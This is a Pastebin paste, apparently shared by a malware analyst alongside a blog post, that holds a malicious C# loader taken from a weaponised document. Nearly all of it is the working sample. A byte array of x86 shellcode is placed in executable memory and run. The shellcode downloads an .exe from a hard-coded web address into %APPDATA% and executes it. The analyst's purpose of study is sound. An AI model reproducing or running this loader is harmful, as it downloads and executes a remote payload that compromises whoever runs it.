API tools faq
paste
dissectmalware

Embedded c# code (mal)

dissectmalware
Mar 31st, 2018
397
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C# 6.60 KB | None | 0 0
raw download clone embed print report
  1. NOTE: Malicious C# code. Please be cause if you want to compile it. Do it on a test environment
  2.  
  3. Please read my blog regarding this code: https://dissectmalware.wordpress.com/2018/03/31/a-close-look-at-malicious-documents-part-ii/
  4.  
  5. using System;
  6. using   System.Runtime.InteropServices;
  7. public  class   S1cA13Ui3D
  8. {
  9.  [DllImport("kernel32.dll")]
  10.     static  extern  IntPtr VirtualAlloc(IntPtr yJ6g, uint   TCSXjMuZ, uint R2VramTDi8,  uint lO);
  11.  private delegate   int YnGULTEE();
  12.  public S1cA13Ui3D(string xotXiQLZOu,   string pAknJ0)
  13.     {
  14.     byte [] SXM2 = {83, 80, 85, 235, 82, 107, 237, 0, 107, 237, 0, 131, 197, 0, 156,
  15. 87, 95, 81, 86, 82, 129, 198, 17, 91, 0, 0, 129, 238, 194, 99, 0,
  16. 0, 129, 233, 155, 85, 0, 0, 129, 198, 123, 49, 0, 0, 141, 150, 173,
  17. 111, 0, 0, 129, 193, 195, 40, 0, 0, 90, 94, 89, 157, 49, 43, 131,
  18. 195, 4, 235, 2, 235, 52, 57, 195, 114, 191, 141, 136, 107, 252, 255,
  19. 255, 232, 5, 2, 0, 0, 93, 235, 42, 232, 0, 0, 0, 0, 91, 144, 144,
  20. 156, 83, 86, 129, 195, 174, 3, 0, 0, 141, 155, 220, 93, 0, 0, 94,
  21. 91, 157, 129, 195, 85, 1, 0, 0, 235, 202, 141, 131, 149, 3, 0, 0,
  22. 235, 132, 88, 91, 235, 4, 251, 182, 199, 105, 195, 216, 82, 199,
  23. 27, 192, 196, 53, 196, 181, 21, 39, 250, 172, 18, 136, 58, 156, 187,
  24. 234, 85, 188, 135, 194, 181, 205, 158, 165, 150, 81, 30, 146, 69,
  25. 206, 87, 39, 101, 14, 17, 235, 48, 95, 193, 133, 174, 211, 218, 1,
  26. 2, 129, 247, 16, 155, 195, 50, 68, 132, 120, 82, 87, 149, 66, 20,
  27. 102, 192, 196, 106, 48, 70, 237, 185, 91, 0, 42, 28, 172, 152, 171,
  28. 158, 82, 207, 168, 128, 28, 181, 155, 121, 191, 246, 132, 242, 19,
  29. 9, 33, 71, 85, 127, 61, 9, 98, 59, 222, 64, 3, 181, 150, 162, 28,
  30. 54, 181, 223, 253, 33, 145, 213, 147, 37, 197, 221, 181, 142, 111,
  31. 255, 87, 114, 116, 54, 220, 4, 181, 182, 61, 197, 97, 35, 100, 207,
  32. 35, 214, 85, 11, 110, 29, 127, 119, 186, 120, 242, 107, 191, 223,
  33. 162, 202, 190, 248, 165, 80, 181, 99, 123, 206, 175, 239, 65, 101,
  34. 243, 226, 254, 205, 80, 53, 216, 147, 89, 216, 93, 85, 165, 232,
  35. 187, 4, 10, 252, 9, 43, 235, 95, 124, 35, 106, 75, 180, 91, 170,
  36. 53, 239, 154, 23, 254, 80, 49, 159, 67, 35, 80, 246, 144, 18, 53,
  37. 208, 165, 109, 116, 40, 185, 103, 49, 124, 179, 92, 107, 13, 114,
  38. 5, 47, 38, 7, 196, 227, 76, 249, 221, 123, 144, 125, 184, 195, 194,
  39. 196, 32, 156, 187, 46, 134, 55, 149, 144, 65, 92, 236, 115, 197,
  40. 168, 35, 86, 241, 200, 161, 232, 68, 193, 17, 79, 33, 40, 161, 102,
  41. 20, 106, 64, 246, 7, 7, 233, 5, 139, 208, 210, 5, 18, 45, 188, 33,
  42. 54, 91, 41, 118, 245, 165, 159, 85, 236, 179, 232, 131, 160, 104,
  43. 0, 116, 0, 116, 0, 112, 0, 58, 0, 47, 0, 47, 0, 114, 0, 115, 0, 110,
  44. 0, 105, 0, 97, 0, 103, 0, 97, 0, 46, 0, 99, 0, 111, 0, 109, 0, 47,
  45. 0, 112, 0, 114, 0, 111, 0, 106, 0, 101, 0, 99, 0, 116, 0, 47, 0,
  46. 73, 0, 114, 0, 97, 0, 110, 0, 111, 0, 108, 0, 46, 0, 101, 0, 120,
  47. 0, 101, 0, 0, 0, 37, 0, 65, 0, 80, 0, 80, 0, 68, 0, 65, 0, 84, 0,
  48. 65, 0, 37, 0, 92, 0, 106, 0, 100, 0, 104, 0, 103, 0, 100, 0, 106,
  49. 0, 104, 0, 103, 0, 100, 0, 103, 0, 100, 0, 104, 0, 103, 0, 100, 0,
  50. 104, 0, 100, 0, 103, 0, 102, 0, 103, 0, 100, 0, 104, 0, 103, 0, 100,
  51. 0, 102, 0, 100, 0, 104, 0, 103, 0, 100, 0, 104, 0, 103, 0, 46, 0,
  52. 101, 0, 120, 0, 101, 0, 0, 0, 0, 0, 85, 137, 229, 129, 236, 68, 1,
  53. 0, 0, 137, 207, 49, 192, 137, 193, 73, 137, 189, 244, 254, 255, 255,
  54. 242, 102, 175, 137, 189, 248, 254, 255, 255, 141, 149, 188, 254,
  55. 255, 255, 82, 232, 163, 1, 0, 0, 139, 133, 188, 254, 255, 255, 255,
  56. 112, 4, 232, 170, 0, 0, 0, 137, 195, 139, 141, 192, 254, 255, 255,
  57. 255, 113, 4, 80, 232, 196, 0, 0, 0, 137, 199, 139, 141, 196, 254,
  58. 255, 255, 255, 113, 4, 83, 232, 179, 0, 0, 0, 137, 198, 139, 141,
  59. 212, 254, 255, 255, 255, 113, 4, 83, 255, 214, 104, 4, 1, 0, 0, 141,
  60. 149, 252, 254, 255, 255, 82, 255, 181, 248, 254, 255, 255, 255, 208,
  61. 139, 141, 200, 254, 255, 255, 255, 113, 4, 255, 215, 139, 141, 208,
  62. 254, 255, 255, 255, 113, 4, 80, 255, 214, 106, 0, 106, 0, 141, 149,
  63. 252, 254, 255, 255, 82, 255, 181, 244, 254, 255, 255, 106, 0, 255,
  64. 208, 139, 141, 216, 254, 255, 255, 255, 113, 4, 255, 215, 139, 141,
  65. 220, 254, 255, 255, 255, 113, 4, 80, 255, 214, 106, 1, 106, 0, 106,
  66. 0, 141, 149, 252, 254, 255, 255, 82, 106, 0, 106, 0, 255, 208, 139,
  67. 141, 204, 254, 255, 255, 255, 113, 4, 83, 255, 214, 106, 0, 255,
  68. 208, 85, 137, 229, 82, 100, 139, 21, 48, 0, 0, 0, 139, 82, 12, 131,
  69. 194, 12, 139, 18, 139, 74, 48, 255, 117, 8, 81, 232, 121, 0, 0, 0,
  70. 133, 192, 116, 238, 139, 66, 24, 90, 201, 194, 4, 0, 85, 137, 229,
  71. 83, 82, 86, 87, 139, 85, 8, 139, 66, 60, 141, 68, 2, 120, 139, 0,
  72. 1, 208, 80, 139, 72, 24, 139, 88, 32, 1, 211, 48, 192, 133, 201,
  73. 116, 60, 81, 139, 11, 141, 12, 17, 137, 207, 87, 139, 117, 12, 49,
  74. 201, 73, 242, 174, 247, 209, 95, 243, 166, 117, 29, 89, 88, 43, 72,
  75. 24, 247, 217, 139, 88, 36, 1, 211, 15, 183, 28, 75, 139, 64, 28,
  76. 141, 4, 152, 139, 4, 16, 1, 208, 235, 12, 131, 195, 4, 89, 73, 235,
  77. 192, 49, 192, 131, 196, 4, 95, 94, 90, 91, 201, 194, 8, 0, 85, 137,
  78. 229, 82, 139, 77, 8, 139, 85, 12, 102, 139, 1, 102, 133, 192, 116,
  79. 57, 102, 59, 2, 116, 41, 102, 131, 248, 97, 114, 6, 102, 131, 248,
  80. 122, 118, 12, 102, 131, 248, 65, 114, 19, 102, 131, 248, 90, 119,
  81. 13, 102, 131, 240, 32, 102, 59, 2, 116, 2, 235, 2, 235, 4, 49, 192,
  82. 235, 14, 131, 193, 2, 131, 194, 2, 102, 139, 1, 235, 194, 131, 200,
  83. 1, 90, 201, 194, 8, 0, 85, 137, 229, 131, 236, 4, 87, 82, 83, 199,
  84. 69, 252, 2, 0, 0, 0, 232, 0, 0, 0, 0, 88, 131, 192, 57, 139, 93,
  85. 8, 185, 1, 0, 0, 0, 133, 201, 116, 22, 137, 199, 137, 3, 131, 195,
  86. 4, 131, 192, 8, 137, 71, 4, 15, 183, 87, 2, 1, 208, 73, 235, 230,
  87. 255, 77, 252, 116, 7, 185, 8, 0, 0, 0, 235, 218, 91, 90, 95, 201,
  88. 194, 4, 0, 24, 0, 26, 0, 0, 0, 0, 0, 107, 0, 101, 0, 114, 0, 110,
  89. 0, 101, 0, 108, 0, 51, 0, 50, 0, 46, 0, 100, 0, 108, 0, 108, 0, 0,
  90. 0, 12, 0, 13, 0, 0, 0, 0, 0, 76, 111, 97, 100, 76, 105, 98, 114,
  91. 97, 114, 121, 65, 0, 14, 0, 15, 0, 0, 0, 0, 0, 71, 101, 116, 80,
  92. 114, 111, 99, 65, 100, 100, 114, 101, 115, 115, 0, 6, 0, 7, 0, 0,
  93. 0, 0, 0, 85, 114, 108, 109, 111, 110, 0, 11, 0, 12, 0, 0, 0, 0, 0,
  94. 69, 120, 105, 116, 80, 114, 111, 99, 101, 115, 115, 0, 18, 0, 19,
  95. 0, 0, 0, 0, 0, 85, 82, 76, 68, 111, 119, 110, 108, 111, 97, 100,
  96. 84, 111, 70, 105, 108, 101, 87, 0, 25, 0, 26, 0, 0, 0, 0, 0, 69,
  97. 120, 112, 97, 110, 100, 69, 110, 118, 105, 114, 111, 110, 109, 101,
  98. 110, 116, 83, 116, 114, 105, 110, 103, 115, 87, 0, 7, 0, 8, 0, 0,
  99. 0, 0, 0, 83, 104, 101, 108, 108, 51, 50, 0, 13, 0, 14, 0, 0, 0, 0,
  100. 0, 83, 104, 101, 108, 108, 69, 120, 101, 99, 117, 116, 101, 87, 0,
  101. 0};;
  102.  IntPtr Zm =    VirtualAlloc(IntPtr.Zero,   (uint)SXM2.Length,  0x1000, 0x40);
  103.  Marshal.Copy(SXM2, 0,  Zm, SXM2.Length);
  104.  YnGULTEE ZcuPj4 =  (YnGULTEE)Marshal.GetDelegateForFunctionPointer(Zm, typeof(YnGULTEE));
  105.  ZcuPj4();
  106.  }
  107. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!